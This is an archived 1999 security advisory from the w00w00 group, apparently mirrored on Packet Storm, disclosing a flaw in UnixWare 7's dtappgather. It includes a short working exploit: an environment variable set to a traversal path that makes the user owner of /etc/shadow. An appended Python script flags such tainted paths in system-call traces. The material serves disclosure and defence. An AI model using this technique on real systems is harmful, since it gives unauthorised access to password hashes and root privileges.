
unixware7.dtappgather.txt

04 Nov 1999. Reported by Shane A. Macaulay. Type: packetstorm. Source: packetstormsecurity.com

w00giving '99 aims to strengthen computer security with vulnerability advisories and best practices.

Code
`Date: Wed, 3 Nov 1999 10:51:52 -0800 (PST)  
From: Sangfroid <[email protected]>  
Subject: bugtraq post  
  
  
  
Introduction to w00giving '99  
  
RFP's most excellent 0kt0berfest commitment to working for  
everyman to make the world more secure, caused w00w00 to stop  
and give thought to our collective contribution to the world  
of computer security. Finding ourselves lacking in the past few months,  
our hearts were pricked and we were driven to repentance.  
  
Being the month of thankfulness for all we have received this year,  
w00w00 looked back and found many things to give back to the computer  
security community.  
============================================================  
To celebrate the upcoming mass-destruction and world-wide chaos in 2000,  
w00w00 Security Development (WSD) will be releasing many advisories  
depending on vendor's timely responses.  
  
The severity of each vulnerability will outweigh the previously posted  
one, so keep your eyes out!  
  
If all goes according to plan, w00giving '99 will close with its largest  
vulnerability on Jan. 1, 2000, aka w00mageddon.  
  
Note: eEye Digital Security is also participating with us to independently  
release NT tools and vulnerabilities within the next few weeks.  
  
w00w00, eEye, rfp, technotronic, wiretrip  
  
======================================================  
w00giving '99  
  
Let the games begin...  
======================================================  
  
Vendors should review available best practice guidelines on  
secure programming techniques. Should they have done so in this  
instance, they would have instantly recognized the security issue we  
discovered.  
We also understand it's much easier to audit code post-release,  
and realize the underpaid coders are pushed to market by  
marketing monkeys and management that do not represent  
secure programming techniques.  
  
MANAGER NOTE:  
======================================================  
THIS IS IMPORTANT, SORRY ABOUT THE LACK OF  
POWER POINT PRESENTATION!  
  
"GIVE YOUR CODERS MORE MONEY AND TIME!"  
======================================================  
END OF MANAGER NOTE, GO BACK TO YOUR MEETING.  
  
Note:  
All you really have to do to find bugs like this is use some  
application like strace, ktrace, or truss (depending on your  
operating environment) and look for suspect calls.  
  
For instance, if you see a call to getenv() and then the  
value of the environment variable mysteriously showing up in an  
open() call, there is probably something wrong here.  
  
Pay strict attention, you will see this material again.  
  
  
======================================================  
  
  
  
UnixWare 7's dtappgather  
Discovered by: K2 ([email protected])  
  
UnixWare 7's dtappgather runs with superuser privileges, but improperly  
checks $DTUSERSESSION to ensure that the file is readable/writable or  
owned by the user running it.  
  
---------------------------------------------------------------------------  
Exploit:  
  
rain:/usr/dt/bin$ export DTUSERSESSION=../../../../etc/shadow  
rain:/usr/dt/bin$ ./dtappgather  
MakeDirectory: /var/dt/appconfig/appmanager/../../../../etc/shadow: File  
exists  
rain:/usr/dt/bin$ ls -la /etc/shadow  
-r-xr-xr-x 1 ktwo other 358 Oct 26 04:37 /etc/shadow*  
  
---------------------------------------------------------------------------  
Patch:  
  
Because SCO doesn't release source for UnixWare, we must wait for them to  
provide one.  
  
---------------------------------------------------------------------------  
  
Contributors to w00giving '99: awr, jobe, Sangfroid, rfp, vacuum, and  
interrupt  
People who deserve hellos: nocarrier, minus, daveg, nny, marc,  
and w00god blake  
  
w00w00 Security Development (WSD)  
[See http://www.datasurge.net/www.w00w00.org, the official mirror, until  
relocation of w00w00.org is complete]  
`
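
The trace-reading check from the advisory's Note, as an added example that is not part of the original post: it flags path-taking calls whose argument contains an environment variable's value, and marks those that resolve outside the directory prefix the program prepended. The strace-style line format, the function name `tainted_path_calls`, and the sample environment and trace are assumptions constructed for illustration.

```python
import posixpath
import re

# Path-taking calls worth auditing in a privileged program's trace.
PATH_CALLS = {"open", "creat", "mkdir", "chown", "chmod", "unlink", "rename"}
CALL_RE = re.compile(r'^(\w+)\("([^"]*)"')


def tainted_path_calls(env, trace_lines, min_len=4):
    """Flag calls whose path argument embeds the value of an environment variable."""
    findings = []
    for line in trace_lines:
        m = CALL_RE.match(line.strip())
        if not m or m.group(1) not in PATH_CALLS:
            continue
        call, path = m.groups()
        for name, value in env.items():
            # Very short values ("C", "/") match paths by coincidence; skip them.
            if len(value) < min_len or value not in path:
                continue
            prefix = path[: path.index(value)]
            resolved = posixpath.normpath(path)
            # Escape: the program's own prefix no longer contains the resolved path.
            base = posixpath.normpath(prefix).rstrip("/") + "/" if prefix else ""
            findings.append({
                "call": call, "var": name, "resolved": resolved,
                "escapes_prefix": bool(prefix) and not (resolved + "/").startswith(base),
            })
    return findings


# Constructed sample data modelled on the advisory's output, not a real truss capture.
SAMPLE_ENV = {"DTUSERSESSION": "../../../../etc/shadow", "HOME": "/home/ktwo", "LANG": "C"}
SAMPLE_TRACE = [
    'open("/usr/lib/locale/C/LC_MESSAGES/app.cat", O_RDONLY) = 3',
    'open("/home/ktwo/.profile", O_RDONLY) = 4',
    'mkdir("/var/dt/appconfig/appmanager/../../../../etc/shadow", 0755) = -1 EEXIST',
    'chown("/var/dt/appconfig/appmanager/../../../../etc/shadow", 1001, 1) = 0',
    'getpid() = 4242',
]

if __name__ == "__main__":
    for f in tainted_path_calls(SAMPLE_ENV, SAMPLE_TRACE):
        print(f)
```

Findings with `escapes_prefix` set are the ones to review first in a set-uid program: the environment value moved a privileged file operation out of the directory the code intended to work in.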
